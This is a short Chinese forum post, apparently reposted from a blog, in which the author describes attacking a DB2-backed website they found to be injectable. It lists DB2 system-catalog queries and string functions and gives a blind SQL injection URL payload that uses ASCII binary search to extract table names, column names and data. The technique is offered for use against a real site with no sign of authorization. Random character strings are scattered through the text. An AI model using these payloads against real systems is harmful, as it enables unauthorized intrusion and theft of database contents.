使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
- J7 X$ D, }) D. U3 ]8 A参考了IBM DB2的文档,总结了这样几条:
) s5 t5 ^0 H* G3 Q7 ^: N! d1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 7 x7 T" B( ~8 m4 }3 G2 `
可以返回系统中所有用户创建的表(table)名
4 r6 k& j9 Z$ H/ Q: k2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' , y0 B& v8 L- J1 ]( C7 [
返回表中的列名
. K6 l& @) m+ t6 E% [3 R3 z3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY 2 p! V1 W; r. e) D6 D" q7 E1 _7 {1 [
这是最关键的地方,返回第一条记录,类似于sql server中的top 1
4 z9 V. D. b2 P# H7 L+ O4 Y4、SUBSTR(string, position, length)
" s* y$ f% h5 z/ ? Q6 E* n返回字符串子串的函数,类似于mid 4 z& g8 i8 o6 j' X/ v _; j/ g
5、ASCII()这个就不用多说了。
+ u5 {5 p7 C% q( R$ A有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
: l! i( u# C6 }& `+ }6 F% b例如判断第一个table的名称的第一个字符的ascii码是否大于50: / Y+ W! Q# Y2 n* @
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 -- ! ^7 _4 Z- K) J) I% |* A
; y8 Z& s+ F( R
http://blog.waynedeng.com/blogview.asp?logID=543
7 E2 A% s8 ~7 ]( d |
发表于 2012-9-15 14:06:51
收藏
支持
反对